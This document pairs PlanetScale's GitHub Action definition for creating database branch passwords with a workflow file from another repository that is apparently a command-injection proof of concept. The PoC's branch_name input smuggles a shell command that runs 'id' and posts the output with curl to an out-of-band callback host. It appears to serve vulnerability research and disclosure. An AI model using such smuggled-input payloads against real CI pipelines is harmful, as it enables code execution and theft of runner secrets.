planetscale/create-branch-password-action/action.yaml
name: 'Create Database Password'
description: 'Creates a password for a PlanetScale database.'
branding:
  color: 'orange'
  icon: 'database'
inputs:
  database_name:
    description: 'The name of the database'
    required: true
  branch_name:
    description: 'The name of the branch'
    required: true
  name:
    description: 'The name of password'
    required: true
  org_name:
    description: 'The name of the organization that owns the database'
    required: true
  role:
    description: 'The role of the password. Allowed values are `reader`, `writer`, `readwriter`, or `admin`. Defaults to `admin`.'
    required: false
outputs:
  username:
    description: 'The username to use for connecting to the branch.'
  password:
    description: 'The password to use for connecting to the branch.'
  hostname:
    description: 'The hostname for the branch.'
runs:
  using: 'docker'
  image: 'Dockerfile'
  args:
    - ${{ inputs.database_name }}
    - ${{ inputs.branch_name }}
    - ${{ inputs.name }}
    - ${{ inputs.org_name }}
    - ${{ inputs.role }}

ugbodagadave/ps-action-cmd-injection-poc/.github/workflows/poc.yml
- name: create-branch-password-action injection probe
  uses: planetscale/create-branch-password-action@v3
  continue-on-error: true
  with:
    org_name: "poc-org"
    database_name: "pocdb"
    branch_name: 'y$(id|curl${IFS}-d${IFS}@-${IFS}dar9fvophf83v5htebf0opnziqr186ggf.oast.online)'
    name: "pocpass"